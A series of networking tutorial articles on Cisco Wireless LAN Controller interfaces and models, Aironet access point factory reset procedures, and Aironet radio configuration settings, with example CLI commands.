Because all WLCs have multiple physical Distribution ports, it is possible to assign all Dynamic interfaces and AP-Manager/Manager interfaces to one physical Distribution port, as shown in the above diagram. In this case, the Distribution port is configured as an 802.1q Trunk port. Alternatively, Dynamic interfaces can also be assigned to separate physical Distribution ports, so that a specific WLAN/Dynamic interface can tunnel its traffic through a single Distribution port.

The dedicated Service-Port seen in the above diagram, which connects directly to the network, can be found only on the WLC 5500 series and the 7500/8500 series.

Let’s take a closer look at each logical interface and explain its purpose:

Management Interface

The management interface is the default interface used to access and manage the WLC. The management interface is also used by the access points to communicate with the WLC. The management interface IP address is the only ping-able IP address and is used by administrators to manage the WLC.

Administrators can log into the WLC’s configuration GUI by entering the management interface IP address in a web browser and logging into the system.

AP-Manager Interface

A controller can have one or more AP-Manager interfaces, which are used for all Layer 3 communications between the controller and lightweight access points after they have joined the controller. The AP-Manager IP address is used as the tunnel source for CAPWAP/LWAPP packets from the controller to the access points, and as the destination IP address for CAPWAP/LWAPP packets from the access points to the controller.

While the configuration and usage of dedicated AP-Manager interfaces is optional, models such as the WLC2504 and WLC5508 do not have a dedicated AP-Manager interface at all. For these models, under the Management interface settings, there is an option labeled Enable Dynamic AP Management that allows the Management interface to also act as an AP-Manager interface:

Figure 5. Cisco WLC2504 - Management interface, Dynamic AP Management option

According to Cisco's documentation, each AP-Manager interface can handle up to 48 access points; however, we believe that with the latest firmware updates this limit has been increased to 75, since the smallest WLC model (2504) can now handle up to 75 access points with its dual-purpose Management/AP-Manager interface. If more access points are installed, multiple AP-Manager interfaces need to be configured.

Virtual Interface

The virtual interface is used to manage and support wireless clients by providing DHCP relay functionality, guest web authentication, VPN termination and other services. The virtual interface plays the following two primary roles:

  • Acts as the DHCP server placeholder for wireless clients that obtain their IP address from a DHCP server.
  • Serves as the redirect address for the web authentication login page (if configured).

The virtual interface IP address is only used for communications between the controller and wireless clients. It never appears as the source or destination address of a packet that goes out through the distribution ports and on to the local network.

Finally, the IP address of the virtual interface must be unique on the network. For this reason, a common IP address used for the virtual interface is 1.1.1.1. All controllers within a mobility group must be configured with the same virtual interface IP address to ensure inter-controller roaming works correctly without connectivity loss.

Service-Port Interface

The service-port interface is used for out-of-band management of the controller. If the management workstation is in a remote subnet, it may be necessary to add an IPv4 route on the controller in order to manage it from the remote workstation.
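On AireOS-based controllers this can typically be done from the CLI with the config route add command, which adds a route for traffic arriving on the service port (the addresses below are illustrative):

(Cisco Controller) > config route add 192.168.100.0 255.255.255.0 192.168.1.1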

It is important to note that the service-port IP address must not reside on the same subnet as the Manager/AP-Manager interface.

Smaller WLC models such as the WLC2124, WLC2504 do not have a service-port interface.

Dynamic Interface

The easiest way to explain dynamic interfaces is to think of them as VLAN interfaces for your wireless networks (SSIDs). One dynamic interface is created per wireless network/SSID. The wireless network or SSID is mapped to a dynamic interface, which is then mapped to a specific VLAN network.

As mentioned earlier, dynamic interfaces can be assigned to separate physical distribution ports, so that traffic from specific WLANs, pass to the wired network via specific distribution ports. In this scenario, each distribution port is a single access-link carrying one VLAN only.

Alternatively, all dynamic interfaces can be mapped to one distribution port, in which case will be a trunk port so that it can carry all WLANs/VLANs. This is a common setup method for smaller networks.

Finally, each dynamic interface must be on a different VLAN or IP subnet from all other interfaces.

Since the WLC2504 controller can handle up to 16 SSIDs, it can have a maximum of 16 dynamic interfaces, and support a maximum of 16 VLANs.

Distribution Port - Link Aggregation

All WLCs support the aggregation of multiple distribution ports into a single port using the 802.3ad port standard. This allows an administrator to create one large link between the WLC and the local switch.

For example, the WLC2504 provides 4 Gigabit Ethernet ports, allowing us to aggregate all 4 ports with the neighbour switch and create a 4 Gigabit Ethernet link with the wired network. EtherChannel will have to be configured on the local switch for the link aggregation to work.

WLCs do not support Link Aggregation Control Protocol (LACP) or Cisco’s proprietary Port Aggregation Protocol (PAgP), and therefore the switch EtherChannel must be configured unconditionally (channel-group mode on). Only one LAG group is supported per controller.

Conclusion

This article introduced the Cisco Wireless LAN Controller interfaces. We covered the interfaces and ports found on WLCs, and analysed each interface's purpose, including Ethernet distribution ports, service port, redundancy port, interfaces such as the management interface, ap-manager interface, virtual interface and dynamic interfaces.




Introduction To Cisco Wireless Controllers (WLC) - Basic Concepts – WLC Models, Benefits & Their Friendly GUI Interface

The Cisco Wireless Controller (WLC) series devices provide a single solution to configure, manage and support corporate wireless networks, regardless of their size and locations. Cisco WLCs have become very popular during the last decade as companies move from standalone Access Point (AP) deployment designs to a centralized controller-based design, reaping the enhanced functionality and redundancy benefits that come with controller-based designs.

Cisco currently offers a number of different WLC models, each targeted at differently sized networks. As expected, the larger models (WLC 8500, 7500, 5760 etc) offer more high-speed gigabit network interfaces, high availability and advanced features required in large & complex networks, for example support for more VLANs and WiFi networks, thousands of APs & clients per WLC device, and more.

Recently, Cisco has begun offering WLC services in higher-end Catalyst switches by embedding the WLC inside Catalyst switches (e.g. Catalyst 3850), but also as a virtual image ('Virtual WLC') that runs under VMware ESX/ESXi 4.x/5.x. Finally, Cisco ISR G2 2900 & 3900 series routers can accept Cisco UCS-E server modules, adding WLC functionality and supporting up to 200 access points and 3000 clients.

Figure 1. A few of the larger Cisco WLC models and Catalyst 3850

More detailed information on the currently available models and their specifications can be obtained from our Cisco Wireless Controller Product and Datasheet section, where you can freely download WLC datasheets containing each model’s features, deployment modes, supported VLANs, maximum access points & clients, encryption features, wireless standards support (802.11xx) and much more.

Learn about WLC interfaces, their physical and logical ports, how they connect to the network and how Wireless SSIDs are mapped to VLAN interfaces, plus much more, in our Cisco WLC Interfaces, Ports & Their Functionality. Understand How WLCs Work, Connect to the Network Infrastructure & Wi-Fi SSID/VLAN mappings article.

Working With The Cisco WLC

While all WLC models support both GUI and CLI based configuration, WLCs are most often configured via their nicely designed web GUI, in contrast with Cisco routers and switches which are usually configured via the CLI. The CLI is mandatory only during the initial configuration, where the engineer is required to assign an IP address to the WLC device, along with a few other important parameters.

Working with any WLC gives the engineer a great advantage as the web interface is identical across all WLC models, making them easy to manage and configure regardless of the model in use:

Figure 2. Cisco WLC 8500 (left) and Cisco WLC 2500 (right) web interface

Unlike other Cisco products, the WLC’s GUI interface is extremely well designed with a logical layout.

When logging into the WLC GUI, the administrator is presented with a healthy amount of information, including a front view of the controller from where the status of each physical port can be seen, along with further details which we’ll be looking into right now.

Below is a screenshot of the WLC2504 homepage web interface:

Figure 3. Cisco 2504 WLC

The great part is that the homepage provides all necessary information an administrator would want to see during a routine check and that includes:

  • Visual state of the controller’s physical ports
  • Status of the controller's hardware (up time, IP address, CPU/Memory usage, temperature, firmware version etc)
  • Summary of Access Points connected and up/down radio interfaces
  • Current connected clients (on all wireless networks)
  • Top wireless networks and number of clients connected to each
  • Rogue Access Points and Clients detected
  • Recent traps generated by the controller

Obtaining more information on any section can be easily done by clicking on the Detail link next to it.  

The following screenshot shows the information presented by the controller when clicking on the Detail link under the Access Point Summary > All Access Points section:

Figure 4. Browsing through all APs currently registered

The information shown is extremely useful as it contains each access point's name, model, MAC address, Up time (extremely useful when troubleshooting client connection issues), access point admin state (enabled/disabled), firmware version and many more.

Equally useful information is provided when clicking on the Detail link of the Client Summary > Current Clients section:

Figure 5. Viewing currently connected clients

In this screen, the controller shows each client’s MAC address, the AP to which it’s connected, the WLAN profile used, the WLAN SSID the client is connected to, the protocol used (802.11a/b/g/n), status and much more. We would, however, like to have the option to also show the wireless client's IP address on this page; currently you need to click on the client's MAC address, after which a page loads showing its IP address alongside other information.

When necessary, the administrator can dive further and obtain more information on almost any aspect of the Wireless network, SSIDs, clients connected, client speeds etc – the list is endless!

Summary

This article introduced the Cisco Wireless LAN Controller (WLC). We explained the basic concepts behind the product, and talked about the different models available and their main features. We took a look at the intuitive GUI interface used to setup and monitor the controller and the whole wireless infrastructure.  More information on Cisco Wireless Controllers and wireless technology can be found in our Cisco Wireless Section. Users can also read about WLC interfaces-ports and their purpose, VLAN/SSID mappings and much more, in our next article: Cisco WLC Interfaces, Ports & Their Functionality. Understand How WLCs Work, Connect to the Network Infrastructure & Wi-Fi SSID/VLAN mappings.

 


Cisco Wireless Controllers (WLC) Datasheets Available for Download

We would like to inform our readers that Firewall.cx has just made available as a free download all of Cisco's Wireless Controller Datasheets.

The datasheets provide valuable information for all currently available Cisco Wireless Controllers, including:

  • Scalability,
  • Performance speed
  • RF Management
  • QoS features
  • Supported Access Points models
  • Maximum Access Points & SSIDs
  • Supported Wireless Standard (802.11xx)
  • Physical interfaces
  • Redundancy options
  • Security standards
  • RFC compliance and support
  • Supported encryption methods
  • Authentication - Authorization & Accounting (AAA) support
  • Ordering information (product-id)
  • Optional accessories
  • License upgrade options and their product-id

Read our article on Cisco Wireless Controllers - Basic concepts, models and benefits they provide to companies.

Readers can head directly to our Cisco Product Datasheets & Guides where they can find the Cisco Wireless Controllers (WLC) Datasheet section amongst other Cisco products.


Cisco Aironet 1100 & 1200 Series (1110, 1121, 1142, 1230, 1240, 1242AG) Factory Reset & Configuration Password Reset Procedure via CLI and Web GUI

Resetting a Cisco Aironet access point can be required if you’ve lost your password or need to wipe out the configuration of a previously configured access point. Cisco provides two main methods to perform a factory reset on the Aironet 1100 and 1200 series access points and these are: 1) Via the Mode Button 2) Via Web Interface

The first method (Mode Button) does not require any user credentials or passwords as the reset procedure is performed during the boot up process and does not involve logging into the access point.

The second method (Web Interface) requires a username and password with privilege level 15 (administrator privileges) in order to perform the reset procedure.

Both reset procedures described below will reset all configuration settings to factory defaults. This means it will erase all passwords, SSIDs, WEP/WPA keys, IP address and anything else configured on the access point.

When the Cisco Aironet access point factory-reset procedure is complete, the default credentials will need to be used to access it. Both the username and the password are Cisco with a capital "C" (case-sensitive). In addition, the factory default IP address of the access point will be 10.0.0.1.

Factory Reset via MODE Button

This is the most common reset method engineers look for, and we’ve got it covered in four easy-to-follow steps!

Step 1
Disconnect power (the power jack for external power or the Ethernet cable for in-line power) from the access point.

Step 2

Press and hold the MODE button while you reconnect power to the access point.

Step 3

Hold the MODE button until the Status LED turns amber (approximately 1 to 2 seconds), and release the button.

Step 4

Reboot the access point by performing a power-cycle (switch it off and then on). After the access point reboots, you must reconfigure it by using the Web-browser interface or the CLI.

CLI Output During Factory Reset via MODE Button

Below is the CLI output during the Mode button reset method.  It is clear that once the access point sees the MODE button pressed for 20 seconds (the time it takes until the status LED turns amber), it initiates the recovery process:

flashfs[0]: 147 files, 7 directories
flashfs[0]: 0 orphaned files, 0 orphaned directories
flashfs[0]: Total bytes: 32385024
flashfs[0]: Bytes used: 5549056
flashfs[0]: Bytes available: 26835968
flashfs[0]: flashfs fsck took 20 seconds.
Reading cookie from system serial eeprom...Done
Base Ethernet MAC address: 1c:de:0f:94:b7:b8
Ethernet speed is 100 Mb - FULL duplex
button pressed for 20 seconds
process_config_recovery: set IP address and config to default 10.0.0.1
process_config_recovery: image recovery
image_recovery: Download default IOS tar image tftp://255.255.255.255/c1140-k9w7-tar.default
examining image...

Factory Reset via Web Interface (Recommended Option for Remote Reset)

Resetting your Cisco access point via its web interface is an easy process.  Following are the steps required:

Step 1
Open a web browser and enter the IP address of your Cisco access point

Step 2

Enter the necessary credentials (username & password)

Step 3

Once successfully logged in, you’ll be presented with the Summary Status page.

Step 4
From the main menu, select System Software and then System Configuration sub-menu.  The access point will present a number of different management options.

Here we can select the Reset to Defaults to initiate the factory reset or alternatively the Reset to Defaults (Except IP) if we wish to reset to factory defaults but keep the current IP address.  The second option is especially handy in case you are required to perform this procedure remotely.

 This completes the Factory Reset procedure for all Cisco Aironet 1100 & 1200 series access points.




Understanding, Configuring & Tweaking Web-based Cisco Aironet Access Point. Network Interface Radio0 802.11a/b/g Settings

Cisco Aironet Access Points, just like most Cisco devices, provide a web interface from which we are able to configure the device. We are often presented with a number of options and settings that we are not really sure why they exist, what they do, or how they can affect the performance of our wireless access point.  This is all about to change!

This article aims to help cover this gap by explaining the various configuration options and settings found in Cisco's Aironet series Web-Based configuration page.  While the web-based interface allows the configuration of many functions within the Aironet device, we will be focusing on the 'Network Interfaces: Radio0-802.11a/b/g' Settings, which is perhaps the most important section for the device's proper wireless operation.

Understanding and correctly configuring your Cisco Aironet Access Points can really make a difference in your clients' wireless performance and connectivity range.  You'd be surprised at the performance difference of your wireless network when you tweak your Cisco Aironet Access Points to adapt to the working environment.

This article explains all the network options found under the Cisco Aironet web-interface setup, in a step-by-step manner.  To help make it easier to track, we have broken the page into three sections, each containing a screenshot of the covered options.

Please note that some features and settings will not appear on your Cisco Aironet Access Point as they are supported only on specific models:

Cisco Aironet Network Interfaces: Radio0-802.11a/b/g Settings

cisco-wireless-ap-web-1

 

Enable Radio

If enabled, the access point sends packets through its 802.11a/b/g radio interface and monitors when other devices use the 802.11a/b/g radio interface to send packets. To change the administrative state of the radio from up to down, choose Disable. To change the administrative state of the radio from down to up, choose Enable.

Current Status (Software/Hardware)

  • Software - Indicates whether the interface has been enabled or disabled by the user.

  • Hardware - Indicates whether the line protocol for the interface is up or down.

Role in Radio Network

Select the role of the access point on your network. Choose one of the three access point (root) settings if the access point is connected to the wired LAN.

Access Point Root (Fallback to Radio Island): This default setting enables wireless clients to continue to associate even when there is no connection to the wired LAN.

Access Point Root (Fallback to Radio Shutdown): When the wired connection is lost, the radio shuts down. This fallback forces the clients to associate to another access point if one is available.

Access Point Root (Fallback to Repeater): When the wired connection is lost, the radio becomes a repeater. The repeater parent should be configured to allow data to be wirelessly transferred to another access point.

Repeater Non-Root: Choose this setting if the access point is not connected to the wired LAN. Client data is transferred to the access point selected as the repeater parent. The repeater parent may be configured as an access point or another repeater.

Fallback Mode Upon Loss of Ethernet Connection: Access points operate as root access points by default. When set to defaults, Cisco Aironet 1400 Series Wireless Bridges start up in install mode and adopt the root role if they do not associate to another bridge. If a 1400 series bridge associates to another bridge at start-up, it automatically adopts the non-root role. Cisco Aironet 1300 Series Wireless Bridges operate as root bridges by default.

Repeater: Specifies that the access point is configured for repeater operation. Repeater operation indicates the access point is not connected to a wired LAN and must associate to a root access point that is connected to the wired LAN.

Root: On access points, specifies that the access point is configured for root mode operation and connected to a wired LAN. This parameter also specifies that the access point should attempt to continue access point operation when the primary Ethernet interface is not functional.

Root Bridge: On 1300 series bridges, specifies that the bridge functions as a root access point. If the Ethernet interface is not functional, the unit attempts to continue access point operation. However, you can specify a fallback mode for the radio. This option is supported only on 1300 series bridges.

Non-root Bridge: On 1400 series bridges, specifies that the bridge operates as a non-root bridge and must associate to a root bridge. This option is supported only on 1400 series bridges.

Fallback Shutdown (Optional): Specifies that the access point should shutdown when the primary Ethernet interface is not functional. This option is supported only on access points and on 1300 series bridges in access point mode.

Fallback Repeater (Optional): Specifies that the access point should operate in repeater mode when the primary Ethernet interface is not functional. This option is supported only on access points and on 1300 series bridges in access point mode.

Install: On 1400 series bridges, configures the bridge for installation mode. In installation mode, the bridge flashes its LEDs to indicate received signal strength (RSSI) to assist in antenna alignment. This option is supported only on 1400 series bridges.

Workgroup-Bridge: On 1300 series bridges, specifies that the bridge operates in workgroup bridge mode. As a workgroup bridge, the device associates to an access point or bridge as a client and provides a wireless LAN connection for devices connected to its Ethernet port. This option is supported only on 1300 series bridges.

Universal Workgroup Bridge Mode: When configuring the universal workgroup bridge role, you must include the client's MAC address. The workgroup bridge will associate with this MAC address only if it is present in the bridge table and is not a static entry. If validation fails, the workgroup bridge associates with its BVI's MAC address. In universal workgroup bridge mode, the workgroup bridge uses the Ethernet client's MAC address to associate with Cisco or non-Cisco root devices. The universal workgroup bridge is transparent and is not managed.

Scanner: This option is supported only when used with a WLSE device on your network. It specifies that the access point operates as a radio scanner only and does not accept associations from client devices. As a scanner, the access point collects radio data and sends it to the WDS access point on your network. This option is supported only on access points.
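For reference, the same role selection can be made from the CLI with the station-role command under the radio interface. The following is a minimal sketch on an autonomous access point, assuming interface Dot11Radio0 and that the fallback keywords are supported on your model and IOS release:

AP(config)# interface Dot11Radio0
! Root access point; shut the radio down if the Ethernet link fails
AP(config-if)# station-role root fallback shutdown
!
! Alternatively, operate as a non-root repeater
AP(config-if)# station-role repeater
!
! Or dedicate the radio to scanning (WLSE/WDS deployments only)
AP(config-if)# station-role scanner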

Data Rates

Use the data rates setting to choose the data transmission rates. The rates are expressed in megabits per second. The device always attempts to transmit at the highest rate selected. If there are obstacles or interference, the device steps down to the highest rate that enables data transmission.

Click the Best Range button to optimize access point range or the Best Throughput button to optimize throughput.

Note: When you configure the 802.11g access point radio for best throughput, the access point sets all 802.11g data rates to basic (required). This setting blocks association from 802.11b client devices.

For each of the rates, choose Require, Enable, or Disable.

  • Require - Enables transmission at this rate for all packets, both unicast and multicast. At least one data rate must be set to Require. A client must support a required rate before it can associate.

  • Enable - Enables transmission at this rate for unicast packets only.

  • Disable - Does not allow transmission at this rate.

Note: The client must support the basic rate you select or it cannot associate with the access point.
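For reference, these GUI choices map to the speed command under the radio interface of an autonomous access point. A minimal sketch, assuming interface Dot11Radio0; the basic- prefix marks a rate as required, and the range/throughput keywords roughly correspond to the Best Range and Best Throughput buttons:

AP(config)# interface Dot11Radio0
! Make 1 and 2 Mbps required (basic) rates and enable the remaining rates
AP(config-if)# speed basic-1.0 basic-2.0 5.5 11.0 6.0 9.0 12.0 18.0 24.0 36.0 48.0 54.0
! Or use the shortcut keywords
AP(config-if)# speed range
AP(config-if)# speed throughput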


cisco-wireless-ap-web-2

Transmit Power: This setting determines the power level of the radio transmission. The default power setting is the highest transmit power allowed in your regulatory domain.

Note: Government regulations define the highest allowable power level for radio devices. This setting must conform to established standards for the country in which you use the device.

To reduce interference, limit the range of your access point, or to conserve power, select a lower power setting.

For an 802.11g radio, Transmit Power is divided into CCK Transmit Power and OFDM Transmit Power. CCK is the modulation used in 802.11g for the lower, 802.11b-compatible data rates, and OFDM is the modulation used in 802.11g for the higher data rates.

Note: The 100 mW (20 dBm) value is not available for rates greater than 12 Mbps.

Power Translation Table (mW/dBm)

The power settings may be in mW or in dBm depending on the particular radio that is being configured. This table translates between mW and dBm.
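The table itself is not reproduced here, but the translation follows directly from the formula dBm = 10 x log10(power in mW). For the power levels typically offered on these radios, the rounded values are approximately:

  • 1 mW = 0 dBm
  • 5 mW = 7 dBm
  • 10 mW = 10 dBm
  • 20 mW = 13 dBm
  • 30 mW = 15 dBm
  • 50 mW = 17 dBm
  • 100 mW = 20 dBm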

Limit Client Power (mW): Determines the maximum power level allowed on client devices that associate to the access point. When a client device associates to the access point, the access point sends the maximum power level setting to the client.

Note: The 100 mW value is not available for rates greater than 12 Mbps.
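From the CLI, transmit power and the client power limit are set with the power command under the radio interface. A minimal sketch for an 802.11g radio, where the CCK and OFDM levels are set separately; the milliwatt values below are illustrative and must fall within your regulatory domain:

AP(config)# interface Dot11Radio0
! Local transmit power for the two 802.11g modulation types
AP(config-if)# power local cck 50
AP(config-if)# power local ofdm 30
! Maximum power level advertised to associating client devices
AP(config-if)# power client 30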

Default Radio Channel: The available selection of radio channels is determined by your regulatory domain. The default setting is the least-congested frequency. With this setting, the device scans for the radio channel that is least busy and selects that channel for use. The device scans at power-up and when the radio settings are changed. You can also select specific channel settings from the Default Radio Channel drop-down menu.
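The equivalent CLI setting is the channel command under the radio interface. A minimal sketch; the available channels and frequencies depend on your regulatory domain:

AP(config)# interface Dot11Radio0
! Let the access point pick the least-busy channel at power-up (default)
AP(config-if)# channel least-congested
! Or pin the radio to a specific channel, e.g. channel 6 (2437 MHz)
AP(config-if)# channel 2437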

Short Slot Time (for 802.11g radios only): Determine if you want to enable support for the Extended-Rate-PHY short slot time. Enabling this setting reduces the slot time from the standard 20 microseconds to 9 microseconds to increase throughput.

Least Congested Channel Search: This selection list is available only when Default Radio Channel is set to Least Congested Frequency. You can search for least congested channels but exclude some channel(s) which are known to be problematic or already in use by other applications. By default, all channels are selected and searched. To select more than one channel, hold down the Ctrl or Shift keys to highlight multiple channels.

World Mode Multi-Domain Operation (for 802.11b and 802.11g only): World mode operation is disabled by default. If you uncheck Disable, the device adds channel carrier set information to its beacon. Client devices with world-mode enabled receive the carrier set information and adjust their settings automatically. If you select the dot11d option, you must enter an ISO country code. If you select the legacy option, you enable Cisco legacy world mode.

With world mode enabled, the access point advertises the local settings, such as allowed frequencies and transmitter power levels. Clients with this capability then passively detect and adopt the advertised world settings, and then actively scan for the best access point.

Country Code (required only for dot11d option): A country code can be selected only if the dot11d option was chosen in the World Mode option above. Use the drop-down menu to select the appropriate country. After the country code, you must enter indoor or outdoor to indicate the placement of the access point.
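On the CLI, world mode is configured with the world-mode command under the radio interface; the dot11d form takes a country code plus an indoor, outdoor or both keyword. A minimal sketch with assumed keywords (verify the exact syntax on your IOS release):

AP(config)# interface Dot11Radio0
! 802.11d world mode, advertising the GB regulatory settings for both placements
AP(config-if)# world-mode dot11d country-code GB both
! Or enable Cisco legacy world mode
AP(config-if)# world-mode legacy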

Radio Preamble (802.11b and 802.11g only): The radio preamble is a section of data at the head of a packet that contains information the access point and the client devices need when sending and receiving packets. Keep the setting on short unless you want to test with long preambles. If the radio preamble is set to short and a client that does not support short preambles associates, the access point will send only long-preamble packets to this client.

  • Short - A short preamble improves throughput performance. Cisco Aironet's Wireless LAN Adapter supports short preambles. The access point and client negotiate the use of the short preamble. Early models of Cisco Aironet's Wireless LAN Adapter require long preambles.

  • Long - A long preamble ensures compatibility between the access point and all early models of Cisco Aironet Wireless LAN Adapters.
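The corresponding CLI command is preamble-short under the radio interface; short preambles are enabled by default and the no form reverts to long preambles. A minimal sketch:

AP(config)# interface Dot11Radio0
! Use short preambles for better throughput (default)
AP(config-if)# preamble-short
! Force long preambles for compatibility with early client adapters
AP(config-if)# no preamble-short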

Receive Antenna and  Transmit Antenna:

  • Diversity - This default setting tells the device to use the antenna that receives the best signal. If your device has two fixed (non-removable) antennas, you should use this setting for both receive and transmit.

  • Left (secondary)- If your device has removable antennas and you install a high-gain antenna on the left connector, you should use this setting for both receive and transmit. When you look at the back panel, the left antenna is on the left.

  • Right (primary)- If your device has removable antennas and you install a high-gain antenna on the right connector, you should use this setting for both receive and transmit. When you look at the back panel, the right antenna is on the right.

Note: The device receives and transmits using only one antenna at a time, so you cannot increase range by installing high-gain antennas on both connectors and pointing one north and one south. When the device uses the north-pointing antenna, client devices located to the south are ignored by the access point.
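From the CLI, the antenna selection is made with the antenna command under the radio interface, assuming the usual diversity, left and right keywords of autonomous IOS:

AP(config)# interface Dot11Radio0
! Default: let the radio use whichever antenna receives the best signal
AP(config-if)# antenna receive diversity
AP(config-if)# antenna transmit diversity
! Example: a single high-gain antenna installed on the right (primary) connector
AP(config-if)# antenna receive right
AP(config-if)# antenna transmit right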

External Antenna Configuration: This feature is currently not operational, but it may be supported in future releases.

Antenna Gain(dB): The gain of an antenna is a measure of the antenna's ability to direct or focus radio energy over a region of space. High-gain antennas have a more focused radiation pattern in a specific direction. This setting is disabled on the bridge.

Aironet Extensions: Select Enable to use Cisco Aironet 802.11 extensions. This setting must be set to Enable so that you can use load balancing, MIC, and TKIP.
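On the CLI this setting corresponds to the dot11 extension aironet interface command, which is enabled by default on most autonomous IOS releases. A minimal sketch:

AP(config)# interface Dot11Radio0
! Enable Cisco Aironet extensions (required for load balancing, MIC and TKIP)
AP(config-if)# dot11 extension aironet
! Disable them only if non-Cisco client interoperability demands it
AP(config-if)# no dot11 extension aironet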

Ethernet Encapsulation Transform: Choose 802.1h or RFC1042 to set the Ethernet encapsulation type. Data packets that are not 802.2 packets must be formatted to 802.2 with 802.1h or RFC1042. Cisco Aironet equipment defaults to RFC1042 because it provides optimum interoperability.

  • 802.1h - This setting provides optimum performance for Cisco Aironet wireless products.

  • RFC1042 - Use this setting to ensure interoperability with non-Cisco Aironet wireless equipment. RFC1042 does not provide the interoperability advantages of 802.1h but is used by other manufacturers of wireless equipment.
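The equivalent CLI setting is assumed to be the payload-encapsulation command under the radio interface, with rfc1042 and dot1h keywords; verify the keyword names on your IOS release. A minimal sketch:

AP(config)# interface Dot11Radio0
! Default encapsulation for packets that are not 802.2 (best interoperability)
AP(config-if)# payload-encapsulation rfc1042
! Or use 802.1h for Cisco-to-Cisco optimised performance
AP(config-if)# payload-encapsulation dot1h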

Reliable Multicast to WGB: Normally, an access point treats a workgroup bridge as an infrastructure device and not as a client. The access point uses the reliable multicast protocol to ensure delivery of all multicast packets. The extra traffic caused by reliable delivery limits the number of workgroup bridges that can be associated. Select Disable to allow the workgroup bridge to be treated as a non-infrastructure device and thus allow the maximum number of workgroup bridges to be associated.

Public Secure Packet Forwarding: Public Secure Packet Forwarding (PSPF) prevents client devices associated to an access point from inadvertently sharing files or communicating with other client devices associated to the access point. It provides Internet access to client devices without providing other capabilities of a LAN.

No exchange of unicast, broadcast, or multicast traffic occurs between protected ports. Choose Enable so that the protected port can be used for secure mode configuration.

PSPF must be set per VLAN.

Note: To prevent communication between clients associated to different access points on your wireless LAN, you must set up protected ports on the switch to which your access points are connected.
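From the CLI, PSPF is enabled per radio bridge group with the port-protected option, while the inter-access-point isolation described in the note above is handled on the Catalyst switch with protected ports. A minimal sketch, assuming bridge-group 1 on the radio and switch port FastEthernet0/1 (illustrative names):

AP(config)# interface Dot11Radio0
! Block client-to-client traffic on this access point (PSPF)
AP(config-if)# bridge-group 1 port-protected

! On the upstream Catalyst switch, isolate access points from each other
Switch(config)# interface FastEthernet0/1
Switch(config-if)# switchport protected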

cisco-wireless-ap-web-3

Short Slot Time: You can increase throughput on the 802.11g radio by enabling short slot time. Reducing the slot time from the standard 20 microseconds to the 9-microsecond short slot time decreases the overall backoff time, which increases throughput. Backoff time, which is a multiple of the slot time, is the random length of time that a station waits before sending a packet on the LAN.

When you enable short slot time, the access point/bridge uses the short slot time only when all clients associated to the 802.11g radio support short slot time. Short slot time is disabled by default.
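On the CLI, short slot time is enabled on the 802.11g radio with the short-slot-time interface command. A minimal sketch:

AP(config)# interface Dot11Radio0
! Reduce the slot time from 20 to 9 microseconds to increase 802.11g throughput
AP(config-if)# short-slot-time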

Beacon Privacy Guest-Mode: This command must be configured if you wish the beacon frames to use the privacy settings of the guest-mode SSID. If there is no guest-mode SSID configured, the command has no effect. If there is a guest-mode SSID and the command is configured, the privacy bit present in the beacon frames is set to ON/OFF according to how the security (encryption) settings of the guest-mode SSID are configured.

The command has no effect in MBSSID mode.

Beacon Period: The beacon period is the amount of time between access point/bridge beacons in kilomicroseconds. One Kusec equals 1,024 microseconds. The default beacon period is 100.

Data Beacon Rate (DTIM): This setting, always a multiple of the beacon period, determines how often the beacon contains a delivery traffic indication message (DTIM). A traffic indication map is present in every beacon. The DTIM notifies power-save client devices that a packet is waiting for them. If power-save clients are active, the access point buffers any multicast traffic and delivers it immediately after the DTIM beacon. Power-save nodes always wake for the DTIM beacons. The longer the time, the more buffering the access point does, and the longer the multicasts are delayed.

If the beacon period is set at 100 (its default setting), and the data beacon rate is set at 2 (its default setting), then the device sends a beacon containing a DTIM every 200 Kusec. One Kusec equals 1,024 microseconds.
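Both values are set from the CLI with the beacon command under the radio interface. A minimal sketch using the default values quoted above:

AP(config)# interface Dot11Radio0
! Send a beacon every 100 Kusec (the default)
AP(config-if)# beacon period 100
! Include a DTIM in every second beacon (the default)
AP(config-if)# beacon dtim-period 2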

Max. Data Retries: The maximum number of attempts the device makes to send a packet before giving up, dropping the packet, and disassociating the client.

RTS Max. Retries: The maximum number of times the device issues an RTS before stopping the attempt to send the packet through the radio. Enter a value from 1 to 128.

Fragmentation Threshold: This setting determines the size at which packets are fragmented (sent as several pieces instead of as one block). Use a low setting in areas where communication is poor or where there is a great deal of radio interference.

RTS Threshold: This setting determines the packet size at which the device issues a request to send (RTS) before sending the packet. A low RTS Threshold setting can be useful in areas where many client devices are associating with the access point or in areas where the clients are far apart and can detect only the access point and not each other.
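These four settings map to the packet retries, rts retries, fragment-threshold and rts threshold commands under the radio interface. A minimal sketch with illustrative values (the valid ranges depend on the radio):

AP(config)# interface Dot11Radio0
! Drop the packet and disassociate the client after 64 failed transmit attempts
AP(config-if)# packet retries 64
! Give up on a packet after 32 unanswered RTS attempts
AP(config-if)# rts retries 32
! Fragment frames larger than 1400 bytes (useful in noisy environments)
AP(config-if)# fragment-threshold 1400
! Send an RTS before any frame larger than 2312 bytes
AP(config-if)# rts threshold 2312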

Repeater Parent AP Timeout: If this timeout is enabled, the access point in repeater mode looks only for the parent access point specified in the following Repeater Parent AP MAC definition for this given amount of time. If the timeout expires, the list is ignored, and the unit associates to an access point that matches its requirements, regardless of its MAC address. If the timeout is disabled, the repeater associates only to parents in the list and continues the search.

Repeater Parent AP MAC 1-4: Normally, a repeater access point (without a wired LAN connection) associates much like a normal client, choosing the best access point it can find. Enter MAC addresses in this list if you want to control the parent access point to which a repeater may associate. If MAC addresses are entered in this list, a repeater associates only to a parent whose MAC address matches an entry in the list. If the first MAC address is not available, the access point continues through the list and waits the amount of time specified in Repeater Parent AP Timeout field before trying the next.
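On a repeater access point, the parent list is configured under the radio interface with the parent command, as sketched below; the MAC addresses are placeholders, and the exact way the parent timeout is expressed in the CLI varies by IOS release, so treat this as an assumption to verify on your platform:

AP(config)# interface Dot11Radio0
AP(config-if)# station-role repeater
! Preferred parent access points, tried in the order 1 to 4
AP(config-if)# parent 1 0040.9631.81cf
AP(config-if)# parent 2 0040.9631.81da
! The Repeater Parent AP Timeout seen in the GUI is an optional timeout on these entries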


Wireless (Wifi) WEP WPA WPA2 Key Generator

The Firewall.cx Wireless LAN Key Generator will allow the generation of a WEP or WPA ASCII based encryption key and will provide the equivalent HEX or ASCII string so it can be inserted directly into a Cisco Access Point configuration.

As many engineers know, it is a common problem that when configuring a WEP encryption key in a Cisco Access Point, the IOS will not allow the input of the actual ASCII key, but instead requires the HEX equivalent. With our WLAN Key generator, simply insert your desired pass phrase and it will generate the necessary HEX value encryption key that needs to be used in the CLI or Web-Based configuration of the Cisco Access Point.
